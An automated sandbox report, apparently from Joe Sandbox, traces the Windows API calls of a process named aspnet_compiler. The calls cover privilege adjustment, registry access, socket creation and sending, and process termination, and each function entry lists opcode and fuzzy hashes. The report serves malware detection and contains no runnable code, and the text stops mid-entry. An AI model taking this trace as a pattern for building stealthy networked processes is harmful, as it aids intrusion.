                                                                                                                                                                        execution_graph 6597 5d42096 6600 5d420cb WSAIoctl 6597->6600 6599 5d42119 6600->6599 6601 134a876 6602 134a8a2 SetErrorMode 6601->6602 6603 134a8cb 6601->6603 6604 134a8b7 6602->6604 6603->6602 6605 134ac76 6606 134ace1 6605->6606 6607 134aca2 FindCloseChangeNotification 6605->6607 6606->6607 6608 134acb0 6607->6608 6507 5d41952 6508 5d4198a OpenFileMappingW 6507->6508 6510 5d419c5 6508->6510 6511 134a7b2 6512 134a7f0 DuplicateHandle 6511->6512 6513 134a828 6511->6513 6514 134a7fe 6512->6514 6513->6512 6515 5d41a52 6517 5d41a8a MapViewOfFile 6515->6517 6518 5d41ad9 6517->6518 6617 5d40f92 6620 5d40fc7 GetFileType 6617->6620 6619 5d40ff4 6620->6619 6519 134af3e 6520 134af6d AdjustTokenPrivileges 6519->6520 6522 134af8f 6520->6522 6621 134b57e 6624 134b5b3 K32EnumProcessModules 6621->6624 6623 134b5e2 6624->6623 6523 30f1902 6525 30f1918 6523->6525 6524 30f2018 6525->6524 6527 30f409c 6525->6527 6528 30f40b8 6527->6528 6529 30f414c 6528->6529 6532 5d40ba2 6528->6532 6536 5d40bee 6528->6536 6529->6524 6535 5d40bc8 MoveFileExW 6532->6535 6534 5d40c41 6534->6529 6535->6534 6537 5d40c1a MoveFileExW 6536->6537 6539 5d40c41 6537->6539 6539->6529 6540 5d412da 6541 5d4132a RasEnumConnectionsW 6540->6541 6542 5d41338 6541->6542 6543 5d4235a 6544 5d4238f RasConnectionNotificationW 6543->6544 6546 5d423c2 6544->6546 6547 134b0ba 6548 134b0ef NtQuerySystemInformation 6547->6548 6549 134b11a 6547->6549 6550 134b104 6548->6550 6549->6548 6625 134a47a 6626 134a4a6 closesocket 6625->6626 6627 134a4dc 6625->6627 6628 134a4b4 6626->6628 6627->6626 6629 5d4139a 6630 5d413d2 WSASocketW 6629->6630 6632 5d4140e 6630->6632 6633 134b666 6634 134b69b K32GetModuleInformation 6633->6634 6636 134b6d2 6634->6636 6551 5d41dc0 6552 5d41d63 CreateMutexW 6551->6552 6555 5d41dcc 6551->6555 6554 5d41d71 6552->6554 6556 134ad22 6558 134ad4b LookupPrivilegeValueW 6556->6558 6559 134ad72 6558->6559 6560 134ab2e 6561 134ab7e MkParseDisplayName 6560->6561 6562 134ab8c 6561->6562 6563 5d41ece 6565 5d41f03 GetProcessTimes 6563->6565 6566 5d41f35 6565->6566 6567 5d42276 6569 5d422ab WSAEventSelect 6567->6569 6570 5d422e2 6569->6570 6571 134aa12 6572 134aa47 RegQueryValueExW 6571->6572 6574 134aa9b 6572->6574 6575 5d40e7a 6576 5d40e7b CreateFileW 6575->6576 6578 5d40f01 6576->6578 6579 134a09a 6580 134a107 6579->6580 6581 134a0cf send 6579->6581 6580->6581 6582 134a0dd 6581->6582 6644 134b25a 6647 134b28f TerminateProcess 6644->6647 6646 134b2b8 6647->6646 6648 5d41fba 6650 5d41fef ioctlsocket 6648->6650 6651 5d4201b 6650->6651 6652 30f567e 6653 30f5681 KiUserExceptionDispatcher 6652->6653 6583 134b786 K32GetModuleFileNameExW 6584 134b7d8 6583->6584 6585 5d42e66 6586 5d42e9b WSAConnect 6585->6586 6588 5d42eba 6586->6588 6654 5d42426 6656 5d4245e RegOpenCurrentUser 6654->6656 6657 5d42491 6656->6657 6658 5d42ca2 6659 5d42cd7 GetAdaptersAddresses 6658->6659 6661 5d42d10 6659->6661 6662 5d41122 6663 5d41157 setsockopt 6662->6663 6665 5d41189 6663->6665 6666 5d40522 6667 5d4055d LoadLibraryA 6666->6667 6669 5d4059a 6667->6669 6670 5d42f2e 6671 5d42f57 select 6670->6671 6673 5d42f8c 6671->6673 6593 134a90a 6594 134a942 RegOpenKeyExW 6593->6594 6596 134a998 6594->6596 6674 5d4262a 6675 5d4265f RegNotifyChangeKeyValue 6674->6675 6677 5d4269c 6675->6677

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 0134AF07, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0134AF87
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdjustPrivilegesToken
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2874748243-0
                                                                                                                                                                        • Opcode ID: d99967a6b2e68b46d158a289c3525980ab9c1cf20f945a6aae477cf3d8299d7d
                                                                                                                                                                        • Instruction ID: c06cc43ce4e61a1e81c4af60001a942b7405173872447d130a71e8ad10a37027
                                                                                                                                                                        • Opcode Fuzzy Hash: d99967a6b2e68b46d158a289c3525980ab9c1cf20f945a6aae477cf3d8299d7d
                                                                                                                                                                        • Instruction Fuzzy Hash: 4421BF75509384AFEB238F25DC40B52BFF4EF06210F08859AE9858F1A3D234A908CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B089, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 0134B0F5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3562636166-0
                                                                                                                                                                        • Opcode ID: 3d270f5a7c922150ee75b0938cc0411991ae5d386e7bc4183d874c8c80067ea5
                                                                                                                                                                        • Instruction ID: 76d358bfe65cae9a89422645dfc0a0ffe07ad653b6ca4a2ec6e70be56c0cc17f
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d270f5a7c922150ee75b0938cc0411991ae5d386e7bc4183d874c8c80067ea5
                                                                                                                                                                        • Instruction Fuzzy Hash: 3E118E724093C09FDB238F14DC45A52FFB4EF16324F0985DAE9848F163D275A918CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134AF3E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0134AF87
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdjustPrivilegesToken
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2874748243-0
                                                                                                                                                                        • Opcode ID: 8395a3cbebd29722b4e9bc4e381ea22c409316516ba7358c9d4dfca004b6f3a0
                                                                                                                                                                        • Instruction ID: 2f05b13c428dd78fb356f1ed0bfd9b0fa09d5609c73880afceca654f361b9c91
                                                                                                                                                                        • Opcode Fuzzy Hash: 8395a3cbebd29722b4e9bc4e381ea22c409316516ba7358c9d4dfca004b6f3a0
                                                                                                                                                                        • Instruction Fuzzy Hash: 091170755402449FEB21CF59DD84B56FBE8FF04320F08C56AED868B652D331E418CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B0BA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 0134B0F5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3562636166-0
                                                                                                                                                                        • Opcode ID: a377e18f269dafe0d4e6c2221607d1fb88c32ecd4ef9741d2b1ed303b82618dc
                                                                                                                                                                        • Instruction ID: 74af2b7892586c901364ed8053eb87977839edacee8115b6d8ec5958c481e083
                                                                                                                                                                        • Opcode Fuzzy Hash: a377e18f269dafe0d4e6c2221607d1fb88c32ecd4ef9741d2b1ed303b82618dc
                                                                                                                                                                        • Instruction Fuzzy Hash: A6018B315002449FDB22CF49D984B25FFE4EF08325F08C59ADD894B616C375E418CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41DC0, Relevance: 1.6, APIs: 1, Instructions: 113synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 5d41dc0-5d41dca 1 5d41db4-5d41db7 CreateMutexW 0->1 2 5d41dcc 0->2 7 5d41d71-5d41d87 1->7 4 5d41de6-5d41e4c 2->4 5 5d41dce-5d41de3 2->5 14 5d41e8e-5d41e93 4->14 15 5d41e4e-5d41e6e 4->15 5->4 9 5d41db9-5d41dbe 7->9 10 5d41d89-5d41daf 7->10 9->10 14->15 19 5d41e95-5d41e9a 15->19 20 5d41e70-5d41e8d 15->20 19->20
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 05D41D69
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1964310414-0
                                                                                                                                                                        • Opcode ID: 2d09754204117649e2b3fa51adb069f78e6e9b21a1d9b12da48eab150b3979c6
                                                                                                                                                                        • Instruction ID: 753f9d997d6efd22fe4cef0857c4e016b67b845c6e57a7cfbe7f8e4ab5e4383d
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d09754204117649e2b3fa51adb069f78e6e9b21a1d9b12da48eab150b3979c6
                                                                                                                                                                        • Instruction Fuzzy Hash: 983106B15053806FE711CF54DD45BA6BFA8FF46320F1881ABE9849F252D334A948CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D424DE, Relevance: 1.6, APIs: 1, Instructions: 110registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 23 5d424de-5d42571 28 5d42576-5d4258d 23->28 29 5d42573 23->29 31 5d425dc-5d425e1 28->31 32 5d4258f-5d42597 RegOpenKeyExW 28->32 29->28 31->32 33 5d4259d-5d425af 32->33 35 5d425b1-5d425d9 33->35 36 5d425e3-5d425e8 33->36 36->35
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 05D42595
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: e13ba6c8776a9bba0ce3a02d4f98d55a4251d6e0d27241668c689e35b7dbf3b1
                                                                                                                                                                        • Instruction ID: f1c2f1bf81442455e1a19ce4190ca650b43c0bb3793d5b046738a6f202e818ab
                                                                                                                                                                        • Opcode Fuzzy Hash: e13ba6c8776a9bba0ce3a02d4f98d55a4251d6e0d27241668c689e35b7dbf3b1
                                                                                                                                                                        • Instruction Fuzzy Hash: FF419272408384AFE7228F64DC55FA6BFB8EF46310F08859BE9859B153D264A509CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D40E3A, Relevance: 1.6, APIs: 1, Instructions: 104fileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 40 5d40e3a-5d40e49 41 5d40e7b-5d40ed2 40->41 42 5d40e4b-5d40e7a 40->42 46 5d40ed4 41->46 47 5d40ed7-5d40ee3 41->47 42->41 46->47 48 5d40ee5 47->48 49 5d40ee8-5d40ef1 47->49 48->49 50 5d40f42-5d40f47 49->50 51 5d40ef3-5d40f17 CreateFileW 49->51 50->51 54 5d40f49-5d40f4e 51->54 55 5d40f19-5d40f3f 51->55 54->55
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 05D40EF9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: ff51eb6e990a1d7e2a75ff50647648f9f7a6c4daa800c40976705c520dfdd96d
                                                                                                                                                                        • Instruction ID: 47832000294021f6a07822fd93104c8f414dc24e3f9db1cee96866b194309978
                                                                                                                                                                        • Opcode Fuzzy Hash: ff51eb6e990a1d7e2a75ff50647648f9f7a6c4daa800c40976705c520dfdd96d
                                                                                                                                                                        • Instruction Fuzzy Hash: 31318F71509384AFE722CB65CD45B66BFE8EF06210F0884AAED859F252D225E509CB71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41354, Relevance: 1.6, APIs: 1, Instructions: 97networkCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 58 5d41354-5d4136b 60 5d4138d-5d413fe 58->60 61 5d4136d-5d4138a 58->61 66 5d41400-5d41408 WSASocketW 60->66 67 5d4144f-5d41454 60->67 61->60 68 5d4140e-5d41424 66->68 67->66 70 5d41456-5d4145b 68->70 71 5d41426-5d4144c 68->71 70->71
                                                                                                                                                                        APIs
                                                                                                                                                                        • WSASocketW.WS2_32(?,?,?,?,?), ref: 05D41406
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Socket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 38366605-0
                                                                                                                                                                        • Opcode ID: 053827bb6ff25a9abedf278fc2e21db41c7fb6e58ec42d16d26d2c25b4ec6363
                                                                                                                                                                        • Instruction ID: 5b75d02f2b71e53b04576e3cb96b7ed5b43553eb5472cdceddc3f2732e223d72
                                                                                                                                                                        • Opcode Fuzzy Hash: 053827bb6ff25a9abedf278fc2e21db41c7fb6e58ec42d16d26d2c25b4ec6363
                                                                                                                                                                        • Instruction Fuzzy Hash: 48318D714093C0AFE723CF65DC44B56BFB9EF06210F0985DBE9859B1A3C325A918CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D426DE, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 90 5d426de-5d42771 94 5d42776-5d42782 90->94 95 5d42773 90->95 96 5d42784-5d4278c RegOpenKeyExW 94->96 97 5d427d1-5d427d6 94->97 95->94 98 5d42792-5d427a4 96->98 97->96 100 5d427a6-5d427ce 98->100 101 5d427d8-5d427dd 98->101 101->100
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 05D4278A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: e00ea33a241b3bf932fcf1a1d67c4bbaa13657fe72684076c15d8bd58dd718f8
                                                                                                                                                                        • Instruction ID: bfed02af683b3a5b73997eb239accf6c21a1e249a9a3e811547ddf0f493122fb
                                                                                                                                                                        • Opcode Fuzzy Hash: e00ea33a241b3bf932fcf1a1d67c4bbaa13657fe72684076c15d8bd58dd718f8
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C31A4B55093846FE7228B24DC45F67BFB8EF46310F08849BED849B153D224A549CB71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D4205D, Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 74 5d4205d-5d420e7 78 5d420ec-5d420f5 74->78 79 5d420e9 74->79 80 5d420f7 78->80 81 5d420fa-5d42109 78->81 79->78 80->81 82 5d4214d-5d42152 81->82 83 5d4210b-5d42113 WSAIoctl 81->83 82->83 84 5d42119-5d4212b 83->84 86 5d42154-5d42159 84->86 87 5d4212d-5d4214a 84->87 86->87
                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAIoctl.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42111
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Ioctl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3041054344-0
                                                                                                                                                                        • Opcode ID: df9ada72545c5301943f2c3f898971404e74e0ab5c56b3e428973a7ae97c5621
                                                                                                                                                                        • Instruction ID: 662048d937437304bd2c34a235acc80f365b61975486061c7d19ed5347e2e8bc
                                                                                                                                                                        • Opcode Fuzzy Hash: df9ada72545c5301943f2c3f898971404e74e0ab5c56b3e428973a7ae97c5621
                                                                                                                                                                        • Instruction Fuzzy Hash: 03318175109780AFEB228F25CD44F66BFF8EF06310F08859AE9859B162D334E949CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134A8D9, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 105 134a8d9-134a965 109 134a967 105->109 110 134a96a-134a981 105->110 109->110 112 134a9c3-134a9c8 110->112 113 134a983-134a996 RegOpenKeyExW 110->113 112->113 114 134a998-134a9c0 113->114 115 134a9ca-134a9cf 113->115 115->114
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0134A989
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: cb144fd1e09584462cd2154749a4687f44b9f7ef34a8067f9f8038280991b02f
                                                                                                                                                                        • Instruction ID: b63d1b41bb4bcb1ce80ded1406bcdf53a49e4913c070a254288287b55ca32ea5
                                                                                                                                                                        • Opcode Fuzzy Hash: cb144fd1e09584462cd2154749a4687f44b9f7ef34a8067f9f8038280991b02f
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C31A276408384AFE7228B25CC85F66FFBCEF06310F08859AED859B152D224A948CB71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134A9D1, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 120 134a9d1-134aa4f 123 134aa54-134aa5d 120->123 124 134aa51 120->124 125 134aa62-134aa68 123->125 126 134aa5f 123->126 124->123 127 134aa6d-134aa84 125->127 128 134aa6a 125->128 126->125 130 134aa86-134aa99 RegQueryValueExW 127->130 131 134aabb-134aac0 127->131 128->127 132 134aac2-134aac7 130->132 133 134aa9b-134aab8 130->133 131->130 132->133
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134AA8C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: 3795fa3ab08c578c7e5ba33936bc30f5303c435fd0eaa36c0e91ea51434d1359
                                                                                                                                                                        • Instruction ID: 8b5989f545902d763e77c72cec297e840c62327d787fec8aa575cf93809bf3c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 3795fa3ab08c578c7e5ba33936bc30f5303c435fd0eaa36c0e91ea51434d1359
                                                                                                                                                                        • Instruction Fuzzy Hash: 2431B1711093806FE722CB25CD85FA2BFE8EF06314F08859AE9859B153D264E94CCB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D4167E, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 149 5d4167e-5d416f9 152 5d416fe-5d41704 149->152 153 5d416fb 149->153 154 5d41706 152->154 155 5d41709-5d41720 152->155 153->152 154->155 157 5d41757-5d4175c 155->157 158 5d41722-5d41735 RegQueryValueExW 155->158 157->158 159 5d41737-5d41754 158->159 160 5d4175e-5d41763 158->160 160->159
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41728
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: ab6dcab706589b77aa69bf3247f1de115f5af6cbd50791592b6f9f186e4c010a
                                                                                                                                                                        • Instruction ID: 0bec9a0c37d7c1f516f20f239b940bae7bc289779cdc1d43aefb3064ef33dc80
                                                                                                                                                                        • Opcode Fuzzy Hash: ab6dcab706589b77aa69bf3247f1de115f5af6cbd50791592b6f9f186e4c010a
                                                                                                                                                                        • Instruction Fuzzy Hash: F131B172108380AFE722CB65CD45FA3BFB8EF06310F0884DBE9859B153D264A549CB71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41A14, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 164 5d41a14-5d41abe 169 5d41ac0-5d41ad7 MapViewOfFile 164->169 170 5d41b02-5d41b07 164->170 171 5d41b09-5d41b0e 169->171 172 5d41ad9-5d41aff 169->172 170->169 171->172
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileView
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3314676101-0
                                                                                                                                                                        • Opcode ID: e62036446949294b6585e965e62297f2598d93f4b90311cfbe3e7cd125d5043a
                                                                                                                                                                        • Instruction ID: d6d0e8956c9b5e5193808baaa9d0be4c151c91e5465980fa55a7dfbfbc6317db
                                                                                                                                                                        • Opcode Fuzzy Hash: e62036446949294b6585e965e62297f2598d93f4b90311cfbe3e7cd125d5043a
                                                                                                                                                                        • Instruction Fuzzy Hash: E931B3B2404780AFE722CF59DC45F56FFF8FF06320F04859AE9849B252D365A549CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B21C, Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 137 134b21c-134b2a8 141 134b2f3-134b2f8 137->141 142 134b2aa-134b2ca TerminateProcess 137->142 141->142 145 134b2cc-134b2f2 142->145 146 134b2fa-134b2ff 142->146 146->145
                                                                                                                                                                        APIs
                                                                                                                                                                        • TerminateProcess.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B2B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 560597551-0
                                                                                                                                                                        • Opcode ID: 2140c0961da1dda06c06240e63a63d71c8b3cff708298bb4bd68bdba3e46db12
                                                                                                                                                                        • Instruction ID: fda1d40fdcbdab25642d5d996960a9591a67a58241b08abe1aa6bd4f5ac09715
                                                                                                                                                                        • Opcode Fuzzy Hash: 2140c0961da1dda06c06240e63a63d71c8b3cff708298bb4bd68bdba3e46db12
                                                                                                                                                                        • Instruction Fuzzy Hash: A321F6725093806FEB128B25DC45BA6BFB8EF47324F1881DAED84DF193C224A905C7B1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41277, Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                        Download Yara Rule

